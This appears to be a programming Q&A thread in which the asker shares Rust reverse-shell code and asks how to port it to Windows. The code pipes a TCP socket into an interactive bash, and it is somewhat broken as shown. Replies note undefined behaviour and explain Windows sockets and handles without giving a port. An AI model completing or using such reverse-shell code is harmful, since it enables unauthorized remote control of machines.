# Rust TcpStream:::as_raw_fd On Windows

Tags: rust

I have this code to open a reverse shell for unix systems.

```rust
use std::net::TcpStream;
use std::os::unix::io::{AsRawFd, FromRawFd};
use std::process::{Command, Stdio};

pub fn main() {
    let full: String = "0.0.0.0:5550";

    let sock = TcpStream::connect(full)?;
    let fd = sock.as_raw_fd();

    Command::new(format!("{}", "bash"))
        .arg("-i")
        .stdin(unsafe { Stdio::from_raw_fd(fd) })
        .stdout(unsafe { Stdio::from_raw_fd(fd) })
        .stderr(unsafe { Stdio::from_raw_fd(fd) })
        .spawn()?
        .wait()?;
}
```

But since std::os::unix doesen't work on windows, you have to use std::os::windows.
And I can't really figure out how to change as_raw_fd and from_raw_fd to something from std::os::windows.

I have read the [docs](https://doc.rust-lang.org/std/os/windows/io/) but I still dont get it

Comment: Are you looking for `as_raw_socket` and `from_raw_socket`? Regardless, the code you posted causes UB, and it would cause UB on Windows too. This is because each file descriptor can only be contained by only one object at a time, [according to the docs](https://doc.rust-lang.org/std/os/unix/io/trait.FromRawFd.html#tymethod.from_raw_fd).

Comment: @Coder-256 Yes I have tried as_raw_socket (sock.as_raw_socket()) but then I dont know how to put it in the stdin, stdout and stderr since TcpStream::from_raw_socket doesen't work with stdio

Comment: Why would no one upvote this, it's a great question

Answer (score 2):

> But since `std::os::unix` doesen't work on windows, you have to use `std::os::windows`. And I can't really figure out how to change `as_raw_fd` and `from_raw_fd` to something from `std::os::windows`.

You can't. Windows doesn't have unified fds it has [*sockets*](https://doc.rust-lang.org/std/os/windows/io/trait.AsRawSocket.html) and [*handles*](https://doc.rust-lang.org/std/os/windows/io/trait.FromRawHandle.html), so you can't just pipe a socket to a program standard streams.

According to [the Socket Handles documentation](https://learn.microsoft.com/en-us/windows/win32/winsock/socket-handles-2)

> A socket handle can optionally be a file handle in Windows Sockets 2.

But it only works for a subset of socket handles, it's not clear how that's supposed to work (aka how you go from a SOCKET to a HANDLE), and it's stil generally recommended against:

> it is recommended that socket handles be used only with Winsock functions.

The safest (on both windows and unices, as Coder-256
notes your use of fds is already way off into UB land) is probably to have your program mediate the interaction explicitely.